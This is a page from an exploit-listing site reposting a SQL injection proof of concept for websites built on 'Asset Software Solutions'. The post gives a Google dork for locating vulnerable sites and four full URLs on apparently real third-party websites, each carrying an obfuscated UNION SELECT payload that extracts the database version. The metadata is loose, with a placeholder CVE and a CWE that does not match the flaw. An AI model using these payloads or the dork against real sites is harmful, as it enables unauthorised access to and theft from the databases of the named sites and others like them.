Advertisement






Asset Software Solutions - Sql Injection Vulnerability

CVE Category Price Severity
CVE-XXXX-XXXX CWE-200 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2023-08-12
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080055

Below is a copy:

Asset Software Solutions - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Asset Software Solutions - Sql Injection Vulnerability
#Date: 2023-08-12
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by Asset Software Solutions"
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:

### Demo :

https://www.sngce.ac.in/announcements-details.php?id=-20%27%20/*!12345union*/%20/*!12345select*/%201,2,version(),4,5,6--+

https://sevabharathiangamaly.org/service_single.php?id=-10%27%20/*!12345union*/%20select%201,version(),3,4,5,6,77--+

https://suntimeindia.com/project-single.php?id=-15%27%20/*!12345union*/%20select%201,version(),3,4,5,6--+

http://jmjcarsltd.co.nz/cardetails.php?id=-94%27%20/*!12345UNION*/%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--+


*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.